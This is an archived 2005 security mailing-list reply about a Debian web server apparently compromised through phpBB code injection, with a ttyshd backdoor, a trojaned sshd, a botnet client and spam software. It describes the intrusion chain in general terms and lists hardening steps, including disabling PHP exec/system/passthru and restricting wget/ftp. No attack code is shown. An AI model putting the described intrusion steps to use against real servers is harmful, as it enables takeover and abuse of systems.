Re: backdoor named tvic / Kayten / ttyshd download in apache logfile
From: Chris Kronberg (smil_at_agleia.de)
Date: 04/26/05
- Next message: Nigel Horne: "Re: E-mail, S/MIME, Digital Signatures & Encryption - HELP!"
- Previous message: Henning: "Re: backdoor named tvic / Kayten / ttyshd download in apache logfile"
- In reply to: Henning: "Re: backdoor named tvic / Kayten / ttyshd download in apache logfile"
- Next in thread: Henning: "Re: backdoor named tvic / Kayten / ttyshd download in apache logfile"
- Reply: Henning: "Re: backdoor named tvic / Kayten / ttyshd download in apache logfile"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 26 Apr 2005 15:40:25 GMT
Henning schrieb im Artikel <7d202f03.0504260051.594bf9e3@posting.google.com>:
>> If this is the case your system might in real trouble.
> Yes it is/was. The ttyshd opened a telnet account for them.
> They managed to gain root access! But i wonder how. It is an debian
That's bitter.
> testing with apt-get upgrade only 2 days before the attack. And their
> telnet shell ran as user www-data.
> They replaced the ssh daemon and the log/network daemons. With the ssh
> daemon they could read the root pw from me. They installed an
*ouch*. A good reason to move away from passwords and use RSA
authentication.
> IRC-BotNet Client to controll the server and another qmail for
> spamming.
> They don't touched my IP Accounting so i know that 2-3 GB of traffic
> was produced.
> They did no more damage because they wanted to have this PC in their
> botnet?
Presumably. A damaged system wouldn't be funny. Usually a cracker
wants to stay after an intrusion was successful.
> Luckily i made a backup 2 days before the attack. I reinstalled the
> system.
Well done.
> (I couldn't trust any file on the server anymore)
>
>> Do you have any cgi script running on your webserver?
> Yes some cgi and php. I think they used a 'code inejction' on an old
> phpBB install of a customer.
Well, phpBB has an awful long list of problems. Some of them
allow remote command execution if I remember correctly.
> I secured the system now. PhP in safe-mode without
> "exec/system/passthru" calls.
> Programs like wget/ftp/chmod ... are only accessible from members of
> "users".
Are you sure that your www-data user is/was not part of that group?
Curious as I am I looked around a little bit and found indeed error
log entries like those you have posted. The ones I found was of a
successful remote command execution of vulnerable scripts using wget
to download stuff.
Btw. what does your access log say? If those were GET requests the
commands given can be reconstructed.
Cheers,
Chris.
- Next message: Nigel Horne: "Re: E-mail, S/MIME, Digital Signatures & Encryption - HELP!"
- Previous message: Henning: "Re: backdoor named tvic / Kayten / ttyshd download in apache logfile"
- In reply to: Henning: "Re: backdoor named tvic / Kayten / ttyshd download in apache logfile"
- Next in thread: Henning: "Re: backdoor named tvic / Kayten / ttyshd download in apache logfile"
- Reply: Henning: "Re: backdoor named tvic / Kayten / ttyshd download in apache logfile"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
